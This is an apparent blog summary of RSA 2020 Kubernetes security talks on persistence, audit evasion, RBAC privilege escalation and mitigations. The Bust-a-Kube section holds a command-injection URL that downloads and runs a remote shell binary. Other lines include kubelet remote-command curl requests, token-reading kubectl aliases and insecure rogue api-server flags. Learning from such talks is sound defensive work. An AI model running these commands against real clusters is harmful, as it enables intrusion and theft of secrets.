RSA 2020 Kubernetes Talks

Kubernetes Highlights from RSA 2020

An overview of the talks given at the RSA 2020 conference regarding kubernetes security threats and mitigations. Ian Coldwater and Brad Geesaman go over advanced threats facing the ecosystem today. Jay Beale provides a walkthrough demonstration of escalating privileges in a game of “Bust-a-Kube”, and Eviatar Gerzi discusses issues and safeguards of RBAC in Kubernetes.

RSA 2020 Kubernetes Talks

Talks:

Advanced Persistence Threats: The Future of Kubernetes Attacks

Ian Coldwater, Lead Platform Security Engineer, Salesforce

Brad Geesaman, Security Consultant, DARKBIT

Video - Link

Slides - Link

Intro

Intro of Kubernetes, including less than ideal architecture with regards to security + authentication

What an Attacker might want:

  • get into cluster
  • steal administrators keys (get cluster admin privilege)
  • hide actions from audit log and monitoring
  • exfiltrate data (like k8s secrets)
  • establish + maintain persistence
  • expand control laterally and ‘updward’ in the cloud

Tapping into the API Server data flow

Validating Webhooks for Evil

Assume admin access, attacker has control of all data and features in the cluster. This is a great starting point for persistence.

To see secrets in real-time as they are created and updated via the api-server by adding a validating webhook. More info about Admission Webhooks can be found in the kubernetes docs

Validating webhooks can forwarded to addresses outside of the cluster. A malicious webhook can simply ‘read’ all secrets created as part of the validating webhooks request flow.

Validating webhooks requires TLS, which can be generated per-webhook. Here’s a script for creating signed certs, from istio installation steps: webhook-create-signed-cert.sh

Cluster admins should be watching modifications and changes to validatingwebhookconfigurations and alert if changes occur.

Oversized Requests for Obfuscation

In GKE, there is no control of the control plane and auditing service. This makes it hard for an attacker attempting to limit chances of detection. An attacker is able to limit information acquired by the auditing service.

Any event or ‘change in state’ in kubernetes has an associated audit log sent to a central logging service. To prevent requests from being audited and logged one can take advantage of how much the audit service can parse into a single log.

For Google’s StackDriver, this size is 256KB. Creating a request that is ‘too large’ causes the audit parsing service to ‘give up’ and only record metadata.

So, we have the following situation:

Objective: Prevent Audit Logs from seeing suspicious specs (or any changes that might cause suspcision)

Facts:

  • Maximum size of Kubernetes API request is 1.5 MiB
  • Max parseable Field size in GKE for auddit log is 256KB

This can be done by padding the annotations field of a request with a large amount of junk data, which hides all data after the annotation.

In-Cluster Shadow API Server

Now that you can hide your dirty deeds, what else?

Why use the ‘official’ api-server?

If you can run a pod on the same node as the api-server, you should also then have access to the TLS certs to talk with etcd, as well as network access to etcd.

With your very own access to etcd, you control the cluster.

To get this special privilage, spin up a replica of the api-server with the ame keys and network path as the ‘real’ api-server.

This maintains a persistent access channel to the ‘source of truth’ for a cluster–etcd.

In the demo, they run the kube-apiserver with the following flags:

- --allow-privileged=true
- --anonymous-auth=true
- --authorization-mode=AlwaysAllow
- --insecure-port=443

allow-privileged is normal and expected.

anonymous-auth is something that is not typically enabled (This also means anyone with network access to this pod will have cluster access?)

Enables anonymous requests to the secure port of the API server. Requests that are not rejected by another authentication method are treated as anonymous requests. Anonymous requests have a username of system:anonymous, and a group name of system:unauthenticated.

authorization-mode with alwaysAllow

This flag allows all requests. Use this flag only if you do not require authorization for your API requests.

insecure-port is running on non-TLS, but still running on port 443 to look like ‘normal traffic’

Taking a Deeper Look at –insecure-port

This shows up in the source code though as being deprecated here, but with a hanging issue left in a comment:

// Though this flag is deprecated, we discovered security concerns over how to do health checks without it e.g. #43784

The issue, titled Recommended liveness check for kube-apiserver, is still open as of Kubernetes v1.17.3.

This also shows up in the documentation here, and an excerpt:

By default the Kubernetes API server serves HTTP on 2 ports:
Localhost Port:
- is intended for testing and bootstrap, and for other components of the master node (scheduler, controller-manager) to talk to the API
- no TLS
- default is port 8080, change with --insecure-port flag.
- default IP is localhost, change with --insecure-bind-address flag.
- request bypasses authentication and authorization modules.
- request handled by admission control module(s).
- protected by need to have host access

c2bernetes: Use Kubernetes as a C2 infrastructure across multiple clusters

Deploy persistence mechanism with least amount of logs tracking activity and greatest chance of going undetected for the longest amount of time and install an agent on all nodes that joined them to an external cluster in the control of an attackers own cluster.

Using k3s, which is a smaller, simpler kubernetes distribution.

Advantages:

  • small single binary
  • all same moving parts as kubernetes
  • only a single TLS connection outbound from the nodes to the control plane

Deployment Steps:

  • Install control-plane component on a VM owned by the attacker in another cloud
  • Craft workload that
    • deployed as daemonset, to run on all nodes in cluster under attack
    • escape the container run on the attacked clusters nodes via chroot into rootfs of host node
    • create separate docker network for k3s agent
    • run k3s agent that connect back to attacker’s control-plane

Notes: hostPath mounts the node’s filesystem. There’s a great talk from Ian Coldwater and Duffie Cooley at Black Hat 2019, here’s the video link for that talk.

Add tolerations so kubernetes scheduler can schedule this daemonset on all nodes in the cluster

From here, it’s easy to create daemonsets to steal all secrets, or cloud instance metadata.

Bring kubelet-exploit back

New Features, old tricks

Ephemeral Containers are used for debugging of containers that have stripped down images. Allows for admins to execute commands in sidecar containers. Ephemeral containers are especially useful when combined with process namespace sharing, which allows processes to be visible to all other containers in a pod.

Dynamic Audit Sink controls where audit logs go. Allowing for attackers to filter logs to help cover tracks and avoid detection. Dynamic kubelet configuration allows for changing kubelet configurations ‘on the fly’

kubelete-exploit was created when default kubelet configurations were less secure, and allowed running of arbitrary commands on a pod on that node.

Now that reconfiguring the kubelet service is so easy (via the API), exploiting old hacks again is possible (and easy).

Use an attack pod to hit the kubelet api, i.e.

Step 1: Launch attack pod

kubectl run attackpod --image=raesene/alpine-nettools:latest

Step 2: curl local node’s kubelet API directly, expecting an Unauthorized response

kubectl exec -it <attack-pod> -- /bin/sh -c 'curl -sk https://172.17.0.3:10250/runningpods/'

Step 3: Modify kubeconfig

  • disable webhook
  • enable anonymous auth
  • authorization.mode.alwaysAllow (forget about security policy)

Step 4: update kubelet configuration to tell worker to use new config for kubelet

Step 5: Run the same attack pod, now allowed to curl kubelet API

Step 6: If able to execute commands on kube-proxy, one step closer to ‘owning’ the node

# use 'kubelet-explot' to run commands on arbitrary container now that kubelet is open again
kubectl exec -it <attack-pod> -- /bin/sh -c "curl -sk -XPOST -d 'cmd=ls /' https://172.17.0.3:10250/run/kube-system/<kube-proxy-pod>/kube-proxy

Mitigation Steps

  • Alert on critical cluster audit logs for changes to webhooks, dynamic config items, RBAC Permissions
  • review feature gate flag settings and RBAC policies for correct permissions
  • try out new features of new k8s releases in a dev environment to develop a plan for upgrades and future versions
    • upgrade in place avoids adding new security features (as opposed to spinning up a new cluster and migrating to that)
  • implemnent your plan for future features as the newer versions become available

Kubernetes Practical Attack and Defense

Jay Beale, CTO, InGuardians

Video – Link

Slides – Link

Attack Surface of Kubernetes

Overview of Pods, Nodes, Services, and an overview of the pieces that make up a cluster (api-server, etcd server, controller manager, scheduler, kube-dns, kubelet, kube-proxy, container runtime, etc)

Prep

Bust-A-Kube Demo

Step 1: Web Vuln into Cluster

Find a vulnerability in a web app hosted on kubernetes. Breaking out metasploit via a url request from the browser:

http://<ip>:30354/index.php?stone=mind-stone.txt;curl -o /tmp/mrsbin http://<hosted-exploit-ip>/mrsbin; chmod ugo+rx /tmp/mrsbin; /tmp/mrsbin&submit=Show+Stone+Information

Once found, and a shell is created on the service

Step 2: Kubernetes Inspection

Start looking for tell-tale files to answer “am I in a cluster?”, i.e. /var/run/secrets

Get serviceaccount token and creds for seeing what access privileges current container has in cluster

alias kubectl="kubectl --server=https://10.23.58.40:6443 --token=`cat /var/run/secrets/kubernetes.io/serviceaccount/token` --certificate-authority=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt"

Can list other services and query them, i.e.

kubectl get services
curl -s http://<service-of-interest>

Step 2: NodeJS Serialization Issue

Deseriazilization is a gold-mine for bugs. For NodeJS applications, we can take advantage of this known exploit Exploiting Node.js deserialization bug for Remote Code Execution (ref: CVE-2017-5941)

Craft an exploit-node-deserialize-with-msf.txt file which is a one-line string. When the nodejs deserializes this string, it will run a function that executes a remote-shell with mrsbin that the nodejs application will deserialize and execute

curl http://<service-of-interest/acquired?flag=<paylod>

Step 3: Jenkins is YOUR butler

Challenge: Additional privileges given when jenkins is considered ‘down’

Take advantage of kubernetes services load-balancing across pods that match a specific label.

Any pod in that namespace with the specified lables matching the selectors for that service will receive traffice for that service.

It won’t get all of the service, but it will get some traffic.

Create a service that returns a 500 http response to ‘trick’ the system into thinking jenkins is down.

When the isjenkins service /isitup endpoint doesn’t recieve a 200 response, it returns a TOKEN that has escalated privileges. Update kubectl alias with new TOKEN and update secret.

Step 4: Own the Hosts

Investigate privileges of new serviceaccount in jenkins pod

kubectl auth can-i create pods

Investigate whether you can run pods on the master node (launch a daemonset with the right tolerations that mounts node host volume).

Master nodes have a taint, which is a kubernetes construct for limiting what pods can run on that specific node. Pods can declare they can run on tainted nodes with tolerations in their pod spec.

When on the master node, break glass with the master nodes .kube/config certs

Peirates

Peirates, a Kubernetes penetration tool, enables an attacker to escalate privilege and pivot through a Kubernetes cluster. It automates known techniques to steal and collect service accounts, obtain further code execution, and gain control of the cluster.

Open source and available on github

Compromising Kubernetes Cluster by Exploiting RBAC Permissions

Eviatar Gerzi, Security Researcher, CyberArk

Video – Link

Slides – Link

Diving into ServiceAccounts

An associated RBAC (Role-Based Access Control) role attached via a roleBinding or clusterRoleBinding to a specific serviceaccount

In default install of Kubernetes, 43 (Cluster)RoleBindings, 51 (Cluster)Roles, 38 Subjects

Which ones have “Risky Permissions” (where a risky permission can be used to escalate permissions)

Risky Permission No 1. - Pod Creation

Keep in mind, there are many ways to create a container (replicationcontroller, replicaset, deployment, daemonset, statefulset, job, cronjob, pod). For now, we focus on creating pods with the pods resource.

Scenario 1: Secret Extraction

Having a cluster role that can create pods.

rules:
- apiGroups: [*]
  resources: ["pods"]
  verbs: ["create"]

You can specificy a serviceAccountName when creating a pod.

The attack scenario is:

  • attacker creates pod with privileged token
  • use privileged token to list all secrets from api-server
  • send secrets back to attacker

Attacker needs to find a serviceAccount that matches the attackers needs: i.e. (get, list, watch)-> (secrets)

Scenario 2: Privileged Container

Run containers with privileged securityContext, which allows for mounting of host device in container. As well as other fun things.

If you haven’t seen the talk by Maya Kaczorowski and Sam “Frenchie” Stewart about privileged containers, watch it! Presentation Link

Scenario 3: Docker socks

Mounting docker host socket /var/run/docker.sock, attacker can communicate with all other containers on the host.

Risky Permission No 2. - Reading Secrets

rules:
- apiGroups: ["*"]
  resources: ["secrets"]
  verbs: ["get"]

Remeber, get must specify the object name, wheras list will list all objects.

So, how to get the secret name? Brute-Force

You can have known prefixes for those known secrets e.g. bootstrap-signer-token but the “token ID” is not known.

However, it is able to be brute-forced.

Mitigation

  • prevent service account token automounting on pods
  • grant specific users to (Cluster)Rolebindings
  • use roles or roleBindings instead of Clusterroles or ClusterRoleBindings (cluster* affects all namespaces)
  • namespace separation
  • use kubiscan

KubiScan

github url

A tool for scanning Kubernetes cluster for risky permissions in Kubernetes’s Role-based access control (RBAC) authorization model.

  • Identify risky Roles\ClusterRoles
  • Identify risky RoleBindings\ClusterRoleBindings
  • Identify risky Subjects (Users, Groups and ServiceAccounts)
  • Identify risky Pods\Containers